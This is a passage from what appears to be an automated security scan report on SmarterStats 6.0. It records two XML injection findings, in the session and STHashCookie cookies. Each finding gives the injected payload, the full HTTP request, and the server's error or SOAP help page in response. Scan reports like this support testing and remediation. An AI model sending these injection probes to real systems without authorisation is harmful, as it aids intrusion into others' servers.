$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the ASP.NET_SessionId cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4]]>>; loginsettings=;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx?op=GetAllSites HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}]]>>; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:15 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28223
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites</h2>
<p class="intro">Returns all sites listed in the MRS with a single log location</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSitesResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSitesResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSitesResult&gt;
&lt;/GetAllSitesResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSitesResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSitesResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSitesResult&gt;
&lt;/GetAllSitesResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
